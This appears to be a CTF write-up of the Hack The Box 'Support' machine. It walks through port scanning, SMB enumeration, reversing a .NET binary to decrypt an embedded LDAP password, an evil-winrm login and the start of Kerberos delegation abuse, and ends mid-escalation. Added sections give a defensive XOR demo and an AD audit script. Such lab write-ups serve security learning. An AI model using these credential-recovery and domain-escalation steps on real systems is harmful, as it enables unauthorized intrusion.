$ sudo nmap -T4 -sC -sV -O 10.10.11.174 -oN nmap.txt -Pn -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 16:37 CST
Nmap scan report for 10.10.11.174
Host is up (0.21s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-07 01:25:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
60575/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-time:
| date: 2022-12-07T01:26:56
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in
Enumeration - DNS
Obviously there's a lot going on in the port list. I'll start at the top and see if I can extract anything from the DNS server.
$ dig version.bind CHAOS TXT @10.10.11.174
Using dig to grab a BIND DNS banner didn't give me any answers. How about ANY records?
$ dig any support.htb @10.10.11.174
; <<>> DiG 9.16.33-Debian <<>> any support.htb @10.10.11.174
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59774
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;support.htb. IN ANY
;; ANSWER SECTION:
support.htb. 600 IN A 10.10.11.174
support.htb. 3600 IN NS dc.support.htb.
support.htb. 3600 IN SOA dc.support.htb. hostmaster.support.htb. 104 900 600 86400 3600
;; ADDITIONAL SECTION:
dc.support.htb. 1200 IN A 10.10.11.174
;; Query time: 1590 msec
;; SERVER: 10.10.11.174#53(10.10.11.174)
;; WHEN: Tue Dec 06 16:51:06 CST 2022
;; MSG SIZE rcvd: 136
I get a couple of subdomains from this. I'll save these for later as I'm not quite sure about them yet. I'll assume dc is the domain controller, although my Windows knowledge is still very fresh. In the meantime, I start a gobuster DNS brute force to see if there are any other undisclosed subdomains. Time to move on to SMB for a bit.
Enumeration - SMB
$ smbmap -H 10.10.11.174 -u anonymous
[+] Guest session IP: 10.10.11.174:445 Name: dc.support.htbn
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
support-tools READ ONLY support staff tools
SYSVOL NO ACCESS Logon server share
Interesting: a read-only share called support-tools. What sort of data can we find in there?
$ smbclient \\\\10.10.11.174\\support-tools
Enter WORKGROUP\ventus's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 12:01:06 2022
.. D 0 Sat May 28 06:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 06:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 06:19:55 2022
putty.exe A 1273576 Sat May 28 06:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 06:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 12:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 06:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 06:19:43 2022
4026367 blocks of size 4096. 969076 blocks available
smb: \>
Reverse Engineering
UserInfo.exe.zip, eh? Unzipped (and by the way, that gobuster DNS brute force didn't turn up anything more):
$ ls
.rw-rw-rw- 99k ventus 1 Mar 12:18 CommandLineParser.dll
.rw-rw-rw- 22k ventus 22 Oct 2021 Microsoft.Bcl.AsyncInterfaces.dll
.rw-rw-rw- 47k ventus 22 Oct 2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
.rw-rw-rw- 84k ventus 22 Oct 2021 Microsoft.Extensions.DependencyInjection.dll
.rw-rw-rw- 64k ventus 22 Oct 2021 Microsoft.Extensions.Logging.Abstractions.dll
.rw-rw-rw- 20k ventus 19 Feb 2020 System.Buffers.dll
.rw-rw-rw- 141k ventus 19 Feb 2020 System.Memory.dll
.rw-rw-rw- 115k ventus 15 May 2018 System.Numerics.Vectors.dll
.rw-rw-rw- 18k ventus 22 Oct 2021 System.Runtime.CompilerServices.Unsafe.dll
.rw-rw-rw- 25k ventus 19 Feb 2020 System.Threading.Tasks.Extensions.dll
.rwxrwxrwx 12k ventus 27 May 12:51 UserInfo.exe
.rw-rw-rw- 563 ventus 27 May 11:59 UserInfo.exe.config
I originally dragged UserInfo.exe into Ghidra to decompile it, but that didn't go too well, so I tried dnSpy, which did a great job decompiling this .NET binary.
Moving along, I looked through the PE's objects to get a grasp of what this binary does. In the UserInfo.Services namespace, I find the LdapQuery class. Its methods include query() and printUser(). On class initialization, there is a call to Protected.getPassword(), which I assume returns the LDAP password. That password is then used to log in to the support.htb LDAP server through the System.DirectoryServices library. Sounds like a way in; time to check out the getPassword method.
Let's step through the method. First, it Base64-decodes Protected.enc_password. It then copies the decoded character array, loops over the original array length, and XORs each byte with the key byte at index i modulo the key length and with the constant 223 to recover the plaintext. Sorry to say that security by obscurity doesn't quite work that well.
Protected.getPassword()
for (int i = 0; i < array.Length; i++)
{
    // array holds the Base64-decoded enc_password; array2 receives the recovered plaintext
    array2[i] = array[i] ^ Protected.key[i % Protected.key.Length] ^ 223;
}
I'll copy this over in Python to see if I can decrypt it there.
decrypt_password.py
import base64
key = "a...o".encode("utf-8")
enc = base64.b64decode("O...E")
print("".join([chr(enc[i] ^ key[i % len(key)] ^ 223) for i in range(len(enc))]))
$ python decrypt_password.py
n...z
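As an added example (not part of the original writeup, and not the binary's own code), here is a port of the Protected.getPassword() loop that makes the point about obscurity concrete: the same XOR routine both embeds and recovers the password, and one known plaintext/blob pair gives the key back. SAMPLE_KEY and SAMPLE_PASSWORD are constructed stand-ins; the real key and blob from UserInfo.exe are not reproduced.

```python
import base64

# Constructed values for this example only; the real Protected.key and
# Protected.enc_password from UserInfo.exe are deliberately not reproduced.
SAMPLE_KEY = b"armando"
SAMPLE_PASSWORD = "Constructed-P@ssw0rd!"


def xor_transform(data: bytes, key: bytes) -> bytes:
    """Port of the loop in Protected.getPassword():
    out[i] = in[i] ^ key[i % len(key)] ^ 223.
    XOR is an involution, so one function both obfuscates and recovers."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ key[i % len(key)] ^ 223 for i, b in enumerate(data))


def obfuscate(password: str, key: bytes) -> str:
    """Produce the Base64 string a developer would paste into enc_password."""
    return base64.b64encode(xor_transform(password.encode("utf-8"), key)).decode("ascii")


def deobfuscate(enc_password: str, key: bytes) -> str:
    """Exactly what the binary does at runtime, with the key it also ships."""
    return xor_transform(base64.b64decode(enc_password), key).decode("utf-8")


def recover_key(enc_password: str, known_plaintext: str) -> bytes:
    """Show why the key adds no secrecy: one known plaintext/blob pair at
    least as long as the key yields the keystream, and its shortest period
    is the key itself (a shorter plaintext yields only a key prefix)."""
    enc = base64.b64decode(enc_password)
    pt = known_plaintext.encode("utf-8")
    stream = bytes(enc[i] ^ pt[i] ^ 223 for i in range(min(len(enc), len(pt))))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


if __name__ == "__main__":
    blob = obfuscate(SAMPLE_PASSWORD, SAMPLE_KEY)
    print("enc_password:", blob)
    print("recovered   :", deobfuscate(blob, SAMPLE_KEY))
    print("key from one known pair:", recover_key(blob, SAMPLE_PASSWORD))
```

The defensive takeaway is that a credential shipped inside a client binary is recoverable by anyone who can download the binary, whatever transform wraps it; the fix is a service account with minimal rights and a secret that is not distributed at all.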
Exploiting LDAP
Alright, let's try it. Using the username from the LdapQuery initializer and the password we decoded, I tried to run ldapdomaindump and...
$ ldapdomaindump 10.10.11.174 -u 'support\\ldap' -p 'n...z' -at SIMPLE
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '80090308: LdapErr: DSID-0C090436, comment: AcceptSecurityContext error, data 52e, v4f7c\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Possibly I'm not using this correctly; I need to read up on LDAP. The good ol' HackTricks GitBook helped me through a lot of service exploitation, and it has a section on LDAP. Let's use ldapsearch and filter on sAMAccountName, as the LdapQuery.query method does.
If there's one thing I learned about LDAP, it's that it gives you so many lines of info. Anyway, lots of stuff, but I see a user named support here. Let's dig into that.
This user's info field had a string that looked very much like a passphrase. Time to save that.
Getting access
I was stuck for a while; I wasn't sure what to do next even though I had creds to test. I looked back at the nmap scan results and researched Windows administration services some more. After further consulting the wonderful HackTricks GitBook, I found WinRM, which might give me command-line access to the server. I picked up evil-winrm to try authenticating to the server from my Linux box.
$ evil-winrm -u support -p 'Iron...l' -i 10.10.11.174
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents>
After some trial and error with evil-winrm's command arguments (I was stuck on having the wrong domain in the -i flag, but apparently it's not needed), I finally have PowerShell access on the server. Now it's time for looting.
Privilege Escalation
Alright, heading to Desktop, I get the user flag, and now it's time for privilege escalation. This part was going way over my head. I took a look at the Windows Local Privilege Escalation section of HackTricks, but nothing seemed too viable. It seemed the support user had limited privileges and was denied access to many system tasks, even something as basic as systeminfo. mimikatz it is. Worth a shot.
Alright then, never mind. WinRM says no. Guess it's back to the drawing board.
Active Directory & Kerberos Abuse
After about half an hour of research, I came across AD/Kerberos abuse, which seemed to be my only hope at the moment. First, I wanted to get some PowerShell post-exploitation modules going. With evil-winrm, I uploaded PowerView.ps1, which is a pretty large module but would make life easier. Since we didn't seem to have any users with an SPN set, I think this process from Red Team Notes is what I'm going to go with first.
First off, I need to verify that we can create new Computer objects in the domain. Looks like we can.
Get-DomainController tells us that we're running Windows Server 2022 Standard. Next I need to find a Computer object which does not have the msds-allowedtoactonbehalfofotheridentity attribute set. Viewing all AD computers, I find the DC computer does not have it set.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer DC | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity*
name msds-allowedtoactonbehalfofotheridentity*
---- -----------------------------------------
DC
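As an added defender-side example (not part of the original writeup), the two things this step reads can be audited from an ldapsearch export: ms-DS-MachineAccountQuota on the domain root, the attribute that lets ordinary users add Computer objects, and which computers already carry msDS-AllowedToActOnBehalfOfOtherIdentity. The LDIF below is constructed for the example and is not an export of support.htb; parse_ldif and audit_rbcd_exposure are hypothetical helper names.

```python
import base64

# Constructed LDIF (ldapsearch output format) invented for this example, not an export of support.htb.
SAMPLE_LDIF = """\
dn: DC=example,DC=test
objectClass: domainDNS
ms-DS-MachineAccountQuota: 10

dn: CN=DC,OU=Domain Controllers,DC=example,DC=test
objectClass: computer
sAMAccountName: DC$

dn: CN=WEB01,CN=Computers,DC=example,DC=test
objectClass: computer
msDS-AllowedToActOnBehalfOfOtherIdentity:: AQAEgBQAAAAAAAAAAAAAACQAAAABAgAAAAAA
 BSAAAAAgAgAA
"""


def parse_ldif(text: str) -> list:
    """Minimal LDIF reader: unfolds continuation lines (leading space),
    splits entries on blank lines, decodes '::' Base64 values to bytes."""
    entries = []
    for block in text.replace("\n ", "").strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            name, _, value = line.partition(":")
            if value.startswith(":"):
                value = base64.b64decode(value[1:].strip())
            else:
                value = value.strip()
            entry.setdefault(name, []).append(value)
        entries.append(entry)
    return entries


def audit_rbcd_exposure(entries: list) -> list:
    """Flag a non-zero ms-DS-MachineAccountQuota (any authenticated user may
    add that many computer objects) and any computer whose
    msDS-AllowedToActOnBehalfOfOtherIdentity is already populated."""
    findings = []
    for e in entries:
        dn = e.get("dn", ["?"])[0]
        quota = e.get("ms-DS-MachineAccountQuota")
        if quota and int(quota[0]) > 0:
            findings.append((dn, f"MachineAccountQuota={int(quota[0])}"))
        if "msDS-AllowedToActOnBehalfOfOtherIdentity" in e:
            findings.append((dn, "RBCD descriptor set; review who is trusted"))
    return findings
```

Setting the quota to 0 and alerting on writes to msDS-AllowedToActOnBehalfOfOtherIdentity (especially on domain controllers) removes both preconditions this writeup relies on.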
Now let's load PowerMad and create a Computer object.
Nice, things are lining up. Now, Red Team Notes wants to use Rubeus for raw interaction with Kerberos. I didn't want to compile it on my machine, but I did find a compiled binary here. I uploaded it through WinRM and continued with the process.